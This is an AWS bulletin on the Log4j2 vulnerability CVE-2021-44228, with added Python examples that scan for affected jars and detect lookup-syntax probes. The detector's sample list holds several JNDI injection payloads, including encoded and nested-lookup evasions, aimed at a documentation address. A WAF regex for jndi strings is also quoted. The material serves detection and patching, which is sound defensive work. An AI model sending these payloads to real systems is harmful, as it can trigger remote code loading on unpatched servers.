AWS log4j bulletin

Update for Apache Log4j2 Issue (CVE-2021-44228)
Initial Publication Date: 2021/12/11 7:30 PM PDT
Last Updated Date: 2021/12/12 9:40 PM PDT
AWS is aware of the recently disclosed security issue relating to the open-source Apache "Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j/2.x/download.html or through their operating system's software update mechanism.
It has been reported that using Log4j2 on JDKs after 8u121 or 8u191 (including JDK 11 and later) mitigates the issue, but this is only a partial mitigation: those JDK releases stop JNDI from loading classes from a remote codebase by default, but the lookup itself still runs, and the returned JNDI reference can still point at classes already on the application's classpath. The only comprehensive solution is to upgrade Log4j2 to 2.15.0, and Log4j2 versions older than 2.15.0 should be considered affected regardless of the JDK distribution or version used.
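The version rule in the paragraph above, turned into a host check. This is an added example written for this page, not AWS code: it walks a directory for Log4j 2 archives (descending into WARs, EARs and fat jars, where log4j-core is usually bundled), reads the version from the manifest or the file name, and flags anything below 2.15.0 as affected. It also reports whether the archive still contains JndiLookup.class, a secondary check that is not part of the bulletin. The archives that demo() scans are constructed fixtures, not real Log4j jars.

```python
"""Walk a directory for Log4j 2 archives and flag those older than 2.15.0.

Added example for this bulletin, not AWS code. Applies the bulletin's rule
(Log4j 2 below 2.15.0 is affected regardless of JDK) plus one extra check the
bulletin does not mention: whether JndiLookup.class is still present.
"""
import io
import os
import re
import tempfile
import zipfile

FIXED = (2, 15, 0, 1)  # 2.15.0 final; a trailing 0 marks an alpha/beta/rc
CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear")
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-?(alpha|beta|rc)\d*)?$", re.I)
_FILENAME_RE = re.compile(r"log4j-core-(\d[\w.-]*)\.jar$", re.I)

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0); None if unparsable."""
    m = _VERSION_RE.match((text or "").strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)

def is_affected(version_text):
    """True for Log4j 2.x below 2.15.0, False for 1.x or >= 2.15.0, None if unknown."""
    v = parse_version(version_text)
    return None if v is None else (v[0] == 2 and v < FIXED)

def _version_of(zf, label):
    """Manifest Implementation-Version (or Log4jReleaseVersion), else the file name."""
    if "META-INF/MANIFEST.MF" in zf.namelist():
        for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
            key, _, value = line.partition(":")
            if key.strip() in ("Implementation-Version", "Log4jReleaseVersion"):
                return value.strip()
    m = _FILENAME_RE.search(os.path.basename(label))
    return m.group(1) if m else None

def _scan_archive(zf, label, findings):
    names = zf.namelist()
    if any(n.startswith(CORE_PREFIX) for n in names):  # this archive is log4j-core
        version = _version_of(zf, label)
        findings.append({"jar": label, "version": version,
                         "has_jndi_lookup": JNDI_CLASS in names,
                         "affected": is_affected(version)})
    for n in names:  # recurse into bundled archives, e.g. WEB-INF/lib/log4j-core-*.jar
        if n.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(n))) as inner:
                    _scan_archive(inner, label + "!" + n, findings)
            except zipfile.BadZipFile:
                pass

def scan_tree(root):
    """One finding per log4j-core archive under root; nested ones get an 'outer!inner' label."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                try:
                    with zipfile.ZipFile(os.path.join(dirpath, f)) as zf:
                        _scan_archive(zf, os.path.join(dirpath, f), findings)
                except zipfile.BadZipFile:
                    pass
    return sorted(findings, key=lambda x: x["jar"])

def _fake_core_jar(version, with_jndi):
    """Constructed stand-in for log4j-core: a manifest plus empty marker entries (not real classes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        zf.writestr(CORE_PREFIX + "Logger.class", b"")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()

def build_fixtures(root):
    """Vulnerable, fixed and class-stripped jars, plus a WAR that bundles a vulnerable one."""
    fixtures = {"log4j-core-2.14.1.jar": ("2.14.1", True), "log4j-core-2.15.0.jar": ("2.15.0", True),
                "log4j-core-2.14.1-stripped.jar": ("2.14.1", False)}
    for name, (version, with_jndi) in fixtures.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(_fake_core_jar(version, with_jndi))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _fake_core_jar("2.14.1", True))

def demo():
    """Build the fixtures in a temp dir, scan them, return (name, version, has_jndi, affected) rows."""
    with tempfile.TemporaryDirectory() as root:
        build_fixtures(root)
        rows = []
        for f in scan_tree(root):
            outer, _, inner = f["jar"].partition("!")
            name = os.path.relpath(outer, root) + ("!" + inner if inner else "")
            rows.append((name, f["version"], f["has_jndi_lookup"], f["affected"]))
    return rows

if __name__ == "__main__":
    for row in demo():
        print("%-45s version=%-7s JndiLookup=%-5s affected=%s" % row)
```

Point scan_tree() at a real application or Tomcat directory to use it. The version check is the authoritative one in this bulletin; the JndiLookup.class column only tells you whether the archive has been hand-modified, and a 2.14.1 jar with the class removed is still reported as affected so that it gets upgraded rather than left as-is.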
Additional service-specific information is below.
If you need additional details or assistance, please contact AWS Support.
API Gateway
We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.
AWS Greengrass
Updates for all Greengrass V2 components that use Apache Log4j2 have been available for deployment since 12/10/2021. These components are Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who use these Greengrass components deploy the latest versions to their devices.
Updates for Greengrass versions 1.10 and 1.11 are expected to be available by 12/17/2021. Customers who use Stream Manager on these devices should update them as soon as the Greengrass binaries for these versions are made available. In the meantime, customers should verify that their custom Lambda code using Stream Manager on Greengrass 1.10 or 1.11 does not pass stream names or file names (for the S3 exporter) that are outside the customer's control, for example a stream name or file name containing the text "${".
Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: the Amazon MQ service code (AWS specific) and the open source code (the Apache ActiveMQ and RabbitMQ message brokers).
We are applying required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.x, which is not affected by this issue. RabbitMQ does not use Log4j2 and is not affected by this issue.
CloudFront
CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at: https://alas.aws.amazon.com.
EMR
CVE-2021-44228 impacts Apache Log4j versions from 2.0 through 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR's default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Lake Formation
Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the issue with the versions referenced in CVE-2021-44228.
S3
S3's data ingress and egress is patched against the Log4j2 issue. We are working to apply the Log4j2 patch to the S3 systems that operate separately from S3's data ingress and egress.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AMS
We are actively monitoring this issue, and are working on addressing it for any AMS services that use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j/2.x/download.html or by using their operating system's software update mechanism.
AMS recommends deploying a Web Application Firewall (WAF) for all Internet-accessible application endpoints. The AWS WAF service can be configured to provide an additional layer of defense against this issue by deploying the AWSManagedRulesAnonymousIpList rule set (which contains rules to block sources known to anonymize client information, such as TOR nodes) and the AWSManagedRulesKnownBadInputsRuleSet rule set (which inspects the URI, request body, and commonly used headers to help block requests related to Log4j and other issues). An earlier revision of this bulletin instead suggested a custom rule using the regex pattern match (?i)\$\{jndi|%2525|%24\{jndi; the managed rule set supersedes that pattern, and neither replaces upgrading Log4j2.
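The WAF guidance above, and the Greengrass advice earlier on this page to reject stream or file names containing "${", both come down to recognising Log4j lookup syntax in input you did not control. The following added example (written for this page, not an AWS or AMS tool) shows why a literal `${jndi` match is not enough: it percent-decodes the request until it stops changing (so %24%7B and double-encoded %2524%257B are seen as "${") and evaluates the `${lower:..}`, `${upper:..}` and `${..:-default}` nesting tricks the way Log4j would before the jndi lookup runs, so the check sees what Log4j would see. The request lines are constructed samples; 203.0.113.10 is a documentation address.

```python
"""Recognise Log4j lookup syntax, including evasions of a literal ${jndi match.

Added example written for this bulletin, not an AWS or AMS tool. The sample
request lines are constructed, not captured traffic.
"""
import re
from urllib.parse import unquote

_INNER = re.compile(r"\$\{([^${}]*)\}")       # innermost ${...}: no braces or $ inside
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)  # what a naive WAF rule looks for

def url_decode_fully(text, max_rounds=4):
    """Percent-decode repeatedly until the text stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def _resolve_one(m):
    """Evaluate one innermost lookup the way Log4j would; leave real lookups untouched."""
    body = m.group(1)
    if body[:6].lower() == "lower:":
        return body[6:].lower()
    if body[:6].lower() == "upper:":
        return body[6:].upper()
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.rsplit(":-", 1)[1]
    return m.group(0)                     # e.g. ${jndi:...}: keep it for the detector

def resolve_lookups(text, max_rounds=32):
    """Collapse nested lookups from the inside out; bounded so crafted input cannot loop forever."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text

def has_lookup_syntax(text):
    """The Greengrass-style check: any ${ in input you do not control is suspect."""
    return "${" in url_decode_fully(text)

def is_jndi_probe(text):
    """The WAF-style check, applied after decoding and nested-lookup resolution."""
    return _JNDI.search(resolve_lookups(url_decode_fully(text))) is not None

# Constructed sample request lines (not captured traffic); 203.0.113.10 is a documentation address.
SAMPLE_REQUESTS = [
    ("url-encoded", "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1"),
    ("double-encoded", "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252F203.0.113.10%252Fa%257D HTTP/1.1"),
    ("nested-lower", "User-Agent: ${${lower:j}ndi:ldap://203.0.113.10/a}"),
    ("default-value", "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.10/a}"),
    ("env-default", "Referer: ${${env:NaN:-j}ndi:rmi://203.0.113.10/a}"),
    ("benign-template", "Referer: https://example.com/docs?tpl=${title}"),
    ("benign-dollar", "GET /search?q=price%20%24100 HTTP/1.1"),
]

def classify(requests=SAMPLE_REQUESTS):
    """Return (label, has_lookup_syntax, is_jndi_probe) for each request line."""
    return [(label, has_lookup_syntax(line), is_jndi_probe(line)) for label, line in requests]

if __name__ == "__main__":
    for label, lookup, jndi in classify():
        print("%-16s lookup_syntax=%-5s jndi_probe=%s" % (label, lookup, jndi))
```

has_lookup_syntax is the stricter test the Greengrass section calls for (any lookup at all is unwanted in a stream or file name), while is_jndi_probe is the request-inspection check a WAF rule approximates. The resolver covers the common nesting evasions, not Log4j's full lookup grammar, so treat it as a detection aid; upgrading Log4j2 remains the fix.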
AMS will continue to monitor this issue and provide additional details and recommendations as they become available.
Amazon Neptune
Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during the update.
NICE
Due to an issue in the Apache Log4j library (CVE-2021-44228, see https://www.randori.com/blog/cve-2021-44228/) included in EnginFrame versions 2020.0 through 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version available at https://download.enginframe.com/ or update the Log4j library in your EnginFrame installation following the instructions on the support website: https://support.nice-software.com/support/solutions/articles/11000111006-updating-log4j-from-2-13-to-2-15-0
Please feel free to contact us via https://support.nice-software.com
Kafka
Amazon Managed Streaming for Apache Kafka (MSK) is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and is applying updates as required. Please note that the builds of Apache Kafka and Apache ZooKeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use Log4j 2.x and are being patched where needed.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache "Log4j2" utility (CVE-2021-44228). We have updated the control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed in a single-tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised to update the Log4j version you use there as well.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact us through AWS Support.
RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during the update of internal components.
OpenSearch
Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.